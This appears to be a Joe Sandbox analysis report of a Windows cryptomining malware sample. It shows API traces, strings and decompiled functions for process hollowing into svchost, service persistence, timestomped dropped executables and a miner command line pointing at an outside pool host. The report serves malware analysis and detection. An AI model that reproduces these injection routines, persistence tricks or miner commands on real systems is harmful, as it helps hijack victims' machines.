                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Virtual$AddressAllocLibraryLoadProcProtect
                                                • String ID:
                                                • API String ID: 1080606849-0
                                                • Opcode ID: 0dffd1b320fd8928b5acca36de38643d518b4fa1e32f542aa4c97c0ea9c1efeb
                                                • Instruction ID: 770b3bacabe01037051c136e618e56e76eb2241de666b5b8a4aead56a4d2cbce
                                                • Opcode Fuzzy Hash: 0dffd1b320fd8928b5acca36de38643d518b4fa1e32f542aa4c97c0ea9c1efeb
                                                • Instruction Fuzzy Hash: 78519975A00226DFDF44CF68C890BAAB7B2FF86304F1981A9D815AB245D731F930CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetSystemInfo.KERNELBASE(?), ref: 0399779C
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: e2792423c1df8ab9529ce6638c14185a49f41e46b7759cc589807ce8af0b2801
                                                • Instruction ID: 589ffe155e90cf01a4e120ad95016dffe34c2d2c4e1a9b5fec7e2e5ce15c6a34
                                                • Opcode Fuzzy Hash: e2792423c1df8ab9529ce6638c14185a49f41e46b7759cc589807ce8af0b2801
                                                • Instruction Fuzzy Hash: 24018B31B1914843DB08CAA8A9513BC73A8D78A311F0443EEFD0DE7B80ED268DA08385
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 03991FC4
                                                • LocalFree.KERNELBASE(?), ref: 03991FDD
                                                • LocalFree.KERNEL32(00000000), ref: 03992045
                                                • LocalFree.KERNEL32(?), ref: 0399204E
                                                • Sleep.KERNEL32(00002710), ref: 0399205C
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe), ref: 0399206B
                                                • CreateFileA.KERNEL32(C:\Windows\system32\TaskIndexer.exe,40000000,00000002,00000000,00000002,00000080,00000000), ref: 039920A4
                                                • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 039920BB
                                                • CloseHandle.KERNEL32(00000000), ref: 039920C6
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe), ref: 039920F5
                                                • new.LIBCMT ref: 039920F9
                                                • Sleep.KERNEL32(00002710), ref: 03992121
                                                • CloseHandle.KERNEL32(00000000), ref: 0399212B
                                                  • Part of subcall function 03991440: CreateFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,C0000000,00000003,00000000,00000003,00000080,00000000,73B75870,00000000), ref: 0399146E
                                                  • Part of subcall function 03991440: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0399149D
                                                  • Part of subcall function 03991440: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 039914F2
                                                  • Part of subcall function 03991440: CloseHandle.KERNEL32(00000000), ref: 039914FC
                                                  • Part of subcall function 039913C0: new.LIBCMT ref: 039913DC
                                                  • Part of subcall function 039913C0: GetStartupInfoA.KERNEL32(?), ref: 039913FD
                                                  • Part of subcall function 039913C0: CreateProcessA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,00000000,00000000,00000000,00000000,00000040,00000000,00000000,00000044,00000000,?,?,?,?,73B75870,00000000), ref: 0399142D
                                                • GetTickCount.KERNEL32 ref: 03992164
                                                • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 03992176
                                                • GetTickCount.KERNEL32 ref: 03992183
                                                • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 03992199
                                                • GetTickCount.KERNEL32 ref: 039921A8
                                                • TerminateProcess.KERNELBASE(00000000,00000000), ref: 039921B2
                                                • TerminateThread.KERNELBASE(?,00000000), ref: 039921BD
                                                • Sleep.KERNELBASE(00002710), ref: 039921D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CreateSleep$CloseCountFreeHandleLocalTick$DeleteObjectProcessSingleTerminateWait$DirectoryInfoStartupSystemThreadWrite
                                                • String ID: C:\Windows\system32\TaskIndexer.exe
                                                • API String ID: 3676629102-1369451346
                                                • Opcode ID: a489917974711c622b672b121059534808520e20ec7bec8d12fb7d25b0eeee0e
                                                • Instruction ID: b5006c859dae82829ae653865e7b2e6b7206ee58bc8460c5a087a5fc528eb938
                                                • Opcode Fuzzy Hash: a489917974711c622b672b121059534808520e20ec7bec8d12fb7d25b0eeee0e
                                                • Instruction Fuzzy Hash: C451C038904209FFEF10EFE9CD85FAEBBB5AF48344F148455E540AB286DB755A00DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32 ref: 039973AD
                                                  • Part of subcall function 03996B20: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996B3A
                                                  • Part of subcall function 03996B20: IsBadHugeReadPtr.KERNEL32(-FC63E248,000000F8), ref: 03996B69
                                                  • Part of subcall function 03996B20: VirtualAlloc.KERNELBASE(?,?,00003000,00000004,?,039973C2,?,?,00000000,00000000), ref: 03996B8C
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039973FF
                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03997422
                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03997436
                                                • ExpandEnvironmentStringsA.KERNEL32(%SystemRoot%\system32\svchost.exe,?,00000104), ref: 039974A2
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 039974ED
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0399750C
                                                Strings
                                                • Not supported paylad architecture!, xrefs: 039973D8
                                                • Creating target process failed!, xrefs: 039974F7
                                                • D, xrefs: 039974CE
                                                • Only 32 bit payloads can be injected from 32bit loader!, xrefs: 03997475
                                                • %SystemRoot%\system32\svchost.exe, xrefs: 0399749D
                                                • Could not allocate memory at the desired base!, xrefs: 039973CB
                                                • Incompatibile payload architecture!, xrefs: 03997468
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$Virtual$AllocCreateEnvironmentExpandFreeProcessStrings
                                                • String ID: %SystemRoot%\system32\svchost.exe$Could not allocate memory at the desired base!$Creating target process failed!$D$Incompatibile payload architecture!$Not supported paylad architecture!$Only 32 bit payloads can be injected from 32bit loader!
                                                • API String ID: 162425537-1639950610
                                                • Opcode ID: 65bb4c4407201389d8755b202e16f7ef5035bc7c8b51d6a47140e6d8d8b9f4c8
                                                • Instruction ID: 2f6bfd5dcc22f0476faaa3d15afa732db35bf2c08f23f4fcc5e5dd0ae97cc6c5
                                                • Opcode Fuzzy Hash: 65bb4c4407201389d8755b202e16f7ef5035bc7c8b51d6a47140e6d8d8b9f4c8
                                                • Instruction Fuzzy Hash: 69510B75744301ABFF20EBA8AC42BAE77ECEF89754F04055AFA449A181EF70A4058796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 92%
                                                			E6FD55670(void* __edi, intOrPtr* _a8) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                				struct _SECURITY_ATTRIBUTES* _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				struct _SERVICE_STATUS _v36;
                                                				intOrPtr _v40;
                                                				struct _SECURITY_ATTRIBUTES* _v44;
                                                				struct _SECURITY_ATTRIBUTES* _v48;
                                                				struct _SECURITY_ATTRIBUTES* _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				struct _SERVICE_STATUS _v64;
                                                				void* __esi;
                                                				signed int _t20;
                                                				int _t24;
                                                				intOrPtr _t31;
                                                				void* _t32;
                                                				intOrPtr _t37;
                                                				void* _t39;
                                                				signed int _t43;
                                                
                                                				_t20 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t20 ^ _t43;
                                                				_t41 = _a8;
                                                				E6FD58E90("FunctionProtocolHost",  *_a8, 0x104);
                                                				E6FD59235("FunctionProtocolHost",  *_a8, 0x104);
                                                				_t24 = RegisterServiceCtrlHandlerA("FunctionProtocolHost", E6FD55840);
                                                				 *0x6fd6b828 = _t24;
                                                				if(_t24 != 0) {
                                                					_push(__edi);
                                                					FreeConsole();
                                                					_v36 = 0x20;
                                                					 *0x6fd6b824 = 2;
                                                					_v32 = 2;
                                                					_v28 = 5;
                                                					_v24 = 0;
                                                					_v20 = 0;
                                                					_v16 = 1;
                                                					_v12 = 0x3e8;
                                                					SetServiceStatus( *0x6fd6b828,  &_v36); // executed
                                                					_v64 = 0x20;
                                                					 *0x6fd6b824 = 4;
                                                					_v60 = 4;
                                                					_v56 = 5;
                                                					_v52 = 0;
                                                					_v48 = 0;
                                                					_v44 = 0;
                                                					_v40 = 0x3e8;
                                                					SetServiceStatus( *0x6fd6b828,  &_v64); // executed
                                                					_t31 = E6FD55490(__edi); // executed
                                                					 *0x6fd6b71c = _t31; // executed
                                                					_t32 = CreateThread(0, 0, E6FD55430, "FunctionProtocolHost", 0, 0); // executed
                                                					_t41 = Sleep;
                                                					_t39 = _t32;
                                                					do {
                                                						Sleep(0x64);
                                                						_t37 =  *0x6fd6b824; // 0x4
                                                					} while (_t37 != 3 && _t37 != 1);
                                                					WaitForSingleObject(_t39, 0xffffffff);
                                                					CloseHandle(_t39);
                                                					if( *0x6fd6b71c == 0x120) {
                                                						L5:
                                                						Sleep(0x2710);
                                                						goto L5;
                                                					}
                                                				}
                                                				return E6FD5599E(_v8 ^ _t43, _t41);
                                                			}



























                                                APIs
                                                • _strncpy.LIBCMT ref: 6FD55690
                                                • __fassign.LIBCMT ref: 6FD556A1
                                                • RegisterServiceCtrlHandlerA.ADVAPI32(FunctionProtocolHost,6FD55840), ref: 6FD556B3
                                                • FreeConsole.KERNEL32 ref: 6FD556C7
                                                • SetServiceStatus.SECHOST(?), ref: 6FD55718
                                                • SetServiceStatus.ADVAPI32(?), ref: 6FD5575F
                                                  • Part of subcall function 6FD55490: _strncpy.LIBCMT ref: 6FD554CA
                                                  • Part of subcall function 6FD55490: RegOpenKeyA.ADVAPI32(80000002,?,00000000), ref: 6FD55519
                                                  • Part of subcall function 6FD55490: RegQueryValueExA.KERNELBASE(00000000,Type,00000000,?,00000000,?,?,?,73B009E0), ref: 6FD55555
                                                  • Part of subcall function 6FD55490: RegCloseKey.ADVAPI32(00000000,?,?,73B009E0), ref: 6FD55563
                                                  • Part of subcall function 6FD55490: SetLastError.KERNEL32(00000000,?,?,73B009E0), ref: 6FD55566
                                                  • Part of subcall function 6FD55490: RegCloseKey.KERNELBASE(00000000,?,?,73B009E0), ref: 6FD55572
                                                • CreateThread.KERNELBASE(00000000,00000000,6FD55430,FunctionProtocolHost,00000000,00000000), ref: 6FD5577D
                                                • Sleep.KERNELBASE(00000064), ref: 6FD55792
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FD557A7
                                                • CloseHandle.KERNEL32(00000000), ref: 6FD557AE
                                                • Sleep.KERNEL32(00002710), ref: 6FD557C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseService$SleepStatus_strncpy$ConsoleCreateCtrlErrorFreeHandleHandlerLastObjectOpenQueryRegisterSingleThreadValueWait__fassign
                                                • String ID: $ $FunctionProtocolHost
                                                • API String ID: 941585804-628322727
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\dllhostex.exe), ref: 039979D8
                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 03997A4F
                                                • gethostbyname.WS2_32(bk.estonine.com), ref: 03997AE6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFileFreeLocalgethostbyname
                                                • String ID: $C:\Windows\system32\dllhostex.exe$IPC$bk.estonine.com$z -o p.boreye.com:53 -u new%s -p x -t %d --donate-level=1 --nicehash
                                                • API String ID: 383526064-4089018970
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 195 39921f0-3992209 196 399239a-39923aa call 3997eca 195->196 197 399220f-399227b call 399c970 GetSystemDirectoryA call 3991380 * 2 195->197 206 3992280-399228f 197->206 206->206 207 3992291-399232b call 399c970 CreateThread * 2 206->207 212 399232d 207->212 213 3992366-399236e 207->213 214 3992330-3992353 Sleep 212->214 215 3992370-399237f TerminateThread 213->215 217 3992358-3992364 214->217 215->215 216 3992381-3992399 Sleep 215->216 216->196 217->213 217->214
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 03992231
                                                • CreateThread.KERNELBASE(00000000,00000000,03997CA0,00000000,00000000,00000000), ref: 039922D9
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00000FB0,00000000,00000000,00000000), ref: 039922F0
                                                • Sleep.KERNELBASE(00007530), ref: 03992335
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03992379
                                                • Sleep.KERNEL32(00001388), ref: 03992386
                                                Strings
                                                • %s\TaskIndexer.exe, xrefs: 03992254
                                                • %s\dllhostex.exe, xrefs: 0399223E
                                                • C:\Windows\system32\dllhostex.exe, xrefs: 03992243
                                                • C:\Windows\system32\TaskIndexer.exe, xrefs: 03992259
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Thread$CreateSleep$DirectorySystemTerminate
                                                • String ID: %s\TaskIndexer.exe$%s\dllhostex.exe$C:\Windows\system32\TaskIndexer.exe$C:\Windows\system32\dllhostex.exe
                                                • API String ID: 2701538180-1491273477
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,C0000000,00000003,00000000,00000003,00000080,00000000,73B75870,00000000), ref: 0399146E
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0399149D
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 039914F2
                                                • CloseHandle.KERNEL32(00000000), ref: 039914FC
                                                • GetFileTime.KERNEL32(00000000,?,?,?), ref: 03991528
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 03991544
                                                • CloseHandle.KERNEL32(00000000), ref: 03991551
                                                • CloseHandle.KERNEL32(00000000), ref: 03991554
                                                Strings
                                                • \svchost.exe, xrefs: 039914BA
                                                • C:\Windows\system32\TaskIndexer.exe, xrefs: 0399146D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateTime$DirectorySystem
                                                • String ID: C:\Windows\system32\TaskIndexer.exe$\svchost.exe
                                                • API String ID: 2251316602-817803103
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(00001388,00000000,73B76490,03997C32), ref: 0399792D
                                                • CreateMutexA.KERNELBASE(00000000,00000001,{B8A7AE22-7F59-CDE5-71F9C2A}), ref: 0399793C
                                                • GetLastError.KERNEL32 ref: 03997948
                                                • ReleaseMutex.KERNEL32(00000000), ref: 03997956
                                                • CloseHandle.KERNEL32(00000000), ref: 0399795D
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0399797B
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03997988
                                                • ReleaseMutex.KERNEL32(00000000), ref: 039979A5
                                                • CloseHandle.KERNEL32(00000000), ref: 039979AC
                                                Strings
                                                • {B8A7AE22-7F59-CDE5-71F9C2A}, xrefs: 03997933
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Mutex$CloseHandleReleaseTerminate$CreateErrorLastProcessSleepThread
                                                • String ID: {B8A7AE22-7F59-CDE5-71F9C2A}
                                                • API String ID: 17202412-3206263115
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(00001388,73B76490,73B75870,039920EC), ref: 03991F1D
                                                • CreateMutexA.KERNELBASE(00000000,00000001,{F5175396-40C2-0218-278D6EE}), ref: 03991F2C
                                                • GetLastError.KERNEL32 ref: 03991F38
                                                • ReleaseMutex.KERNEL32(00000000), ref: 03991F46
                                                • CloseHandle.KERNEL32(00000000), ref: 03991F4D
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 03991F6B
                                                • TerminateThread.KERNEL32(?,00000000), ref: 03991F78
                                                • ReleaseMutex.KERNEL32(00000000), ref: 03991F95
                                                • CloseHandle.KERNEL32(00000000), ref: 03991F9C
                                                Strings
                                                • {F5175396-40C2-0218-278D6EE}, xrefs: 03991F23
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Mutex$CloseHandleReleaseTerminate$CreateErrorLastProcessSleepThread
                                                • String ID: {F5175396-40C2-0218-278D6EE}
                                                • API String ID: 17202412-3826849957
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 254 6fd53eb0-6fd53edc CreateFileA 255 6fd53ee5-6fd53f15 GetFileSizeEx LocalAlloc 254->255 256 6fd53ede-6fd53ee4 254->256 257 6fd53f17-6fd53f25 CloseHandle 255->257 258 6fd53f26-6fd53f34 255->258 259 6fd53f36 258->259 260 6fd53f6c-6fd53f70 258->260 263 6fd53f40-6fd53f5c ReadFile 259->263 261 6fd53f72-6fd53f8a CloseHandle LocalFree 260->261 262 6fd53f8b-6fd53f98 CloseHandle 260->262 264 6fd53f5e-6fd53f67 263->264 265 6fd53f69 263->265 264->263 264->265 265->260
                                                C-Code - Quality: 64%
                                                			E6FD53EB0(void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v8;
                                                				long _v12;
                                                				long _v16;
                                                				struct _OVERLAPPED* _v20;
                                                				long _v24;
                                                				void* _t15;
                                                				void* _t17;
                                                				long _t18;
                                                				long _t26;
                                                				void* _t30;
                                                				void** _t31;
                                                				struct _OVERLAPPED** _t35;
                                                				void* _t37;
                                                				long _t38;
                                                
                                                				_v8 = __edx;
                                                				_t15 = CreateFileA("C:\Windows\system32\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_t30 = _t15;
                                                				if(_t30 != 0xffffffff) {
                                                					_v24 = 0;
                                                					_v20 = 0;
                                                					__imp__GetFileSizeEx(_t30,  &_v24, _t37);
                                                					_t38 = _v24;
                                                					_v16 = _t38;
                                                					_t17 = LocalAlloc(0x40, _t38);
                                                					_t31 = _v8;
                                                					 *_t31 = _t17;
                                                					if(_t17 != 0) {
                                                						_t35 = _a4;
                                                						_t18 = _t38;
                                                						 *_t35 = 0;
                                                						if(_t18 > 0) {
                                                							asm("o16 nop [eax+eax]");
                                                							while(1) {
                                                								_v12 = 0;
                                                								ReadFile(_t30,  *_t31, _t38,  &_v12, 0); // executed
                                                								_t26 = _v12;
                                                								if(_t26 == 0) {
                                                									break;
                                                								}
                                                								 *_t35 =  *_t35 + _t26;
                                                								_t38 = _t38 - _t26;
                                                								_t31 = _v8;
                                                								if(_t38 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t18 = _v16;
                                                						}
                                                						_push(_t30);
                                                						if( *_t35 == _t18) {
                                                							CloseHandle();
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v8);
                                                							return 0;
                                                						}
                                                					} else {
                                                						CloseHandle(_t30);
                                                						return 0;
                                                					}
                                                				} else {
                                                					return 0;
                                                				}
                                                			}


















                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,6FD548F0,?), ref: 6FD53ED1
                                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 6FD53EF9
                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 6FD53F08
                                                • CloseHandle.KERNEL32(00000000), ref: 6FD53F18
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 6FD53EC9
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: File$AllocCloseCreateHandleLocalSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 966313076-2357825738
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 94%
                                                			E6FD55490(void* __edi) {
                                                				signed int _v8;
                                                				char _v508;
                                                				void* _v512;
                                                				char _v516;
                                                				int _v520;
                                                				int _v524;
                                                				void* __esi;
                                                				signed int _t19;
                                                				void* _t23;
                                                				unsigned int _t24;
                                                				long _t29;
                                                				long _t36;
                                                				void _t38;
                                                				void _t39;
                                                				signed int _t41;
                                                				void* _t50;
                                                				signed int _t57;
                                                
                                                				_t19 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t19 ^ _t57;
                                                				_v512 = 0;
                                                				_v516 = 0;
                                                				E6FD58E90( &_v508, "SYSTEM\\CurrentControlSet\\Services\\", 0x1f4);
                                                				_t23 = 0x6fd6b830;
                                                				_t56 = 0x6fd6b830;
                                                				do {
                                                					_t38 =  *_t23;
                                                					_t23 = _t23 + 1;
                                                				} while (_t38 != 0);
                                                				_t24 = _t23 - 0x6fd6b830;
                                                				_t50 =  &_v508 - 1;
                                                				do {
                                                					_t39 =  *(_t50 + 1);
                                                					_t50 = _t50 + 1;
                                                				} while (_t39 != 0);
                                                				_t41 = _t24 >> 2;
                                                				memcpy(0x6fd6b830 + _t41 + _t41, 0x6fd6b830, memcpy(_t50, 0x6fd6b830, _t41 << 2) & 0x00000003);
                                                				_t29 = RegOpenKeyA(0x80000002,  &_v508,  &_v512); // executed
                                                				if(_t29 == 0) {
                                                					_v520 = 4;
                                                					_t36 = RegQueryValueExA(_v512, "Type", 0,  &_v524,  &_v516,  &_v520); // executed
                                                					_t56 = _t36;
                                                					RegCloseKey(_v512);
                                                					SetLastError(_t36);
                                                				}
                                                				RegCloseKey(_v512); // executed
                                                				return E6FD5599E(_v8 ^ _t57, _t56);
                                                			}

                                                APIs
                                                • _strncpy.LIBCMT ref: 6FD554CA
                                                • RegOpenKeyA.ADVAPI32(80000002,?,00000000), ref: 6FD55519
                                                • RegQueryValueExA.KERNELBASE(00000000,Type,00000000,?,00000000,?,?,?,73B009E0), ref: 6FD55555
                                                • RegCloseKey.ADVAPI32(00000000,?,?,73B009E0), ref: 6FD55563
                                                • SetLastError.KERNEL32(00000000,?,?,73B009E0), ref: 6FD55566
                                                • RegCloseKey.KERNELBASE(00000000,?,?,73B009E0), ref: 6FD55572
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Close$ErrorLastOpenQueryValue_strncpy
                                                • String ID: FunctionProtocolHost$SYSTEM\CurrentControlSet\Services\$Type
                                                • API String ID: 1805282133-3934316727
                                                • Opcode ID: 8911c4ab35d2ff69b697563c05ecba72ea4d6a40dd31ae6f4b136a2c5164c8df
                                                • Instruction ID: 5fcce7f962118d5de224920ab70403c3f092a985bf8298777c301522f3a55fbd
                                                • Opcode Fuzzy Hash: 8911c4ab35d2ff69b697563c05ecba72ea4d6a40dd31ae6f4b136a2c5164c8df
                                                • Instruction Fuzzy Hash: 9D21807190021E9BDF21DB64DC08BEAB7B8EF46318F0401E5E919A7241DB307E989F90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 03996677
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996695
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 039966A9
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039966CA
                                                  • Part of subcall function 03996660: IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039966EC
                                                • GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 0399716E
                                                • SetThreadContext.KERNELBASE(?,00010002), ref: 0399718C
                                                • GetThreadContext.KERNELBASE(?,00010002), ref: 039971C4
                                                • WriteProcessMemory.KERNELBASE(?,00000000,?,00000000,?), ref: 03997215
                                                Strings
                                                • Cannot update ImageBaseAddress!, xrefs: 0399721F
                                                • Failed getting remote PEB address!, xrefs: 03997239
                                                • Cannot update remote EP!, xrefs: 03997240
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$ContextThread$MemoryProcessWrite
                                                • String ID: Cannot update ImageBaseAddress!$Cannot update remote EP!$Failed getting remote PEB address!
                                                • API String ID: 2607351119-2699618380
                                                • Opcode ID: df00547ee7b2e4ad936eef959efeb4623ad668ff83ba6f5b551a865db5df0b6b
                                                • Instruction ID: 2d6bf1c198da03598f3fb9b38d67939f61830e71b09a99e4d70b6dba99dafaf3
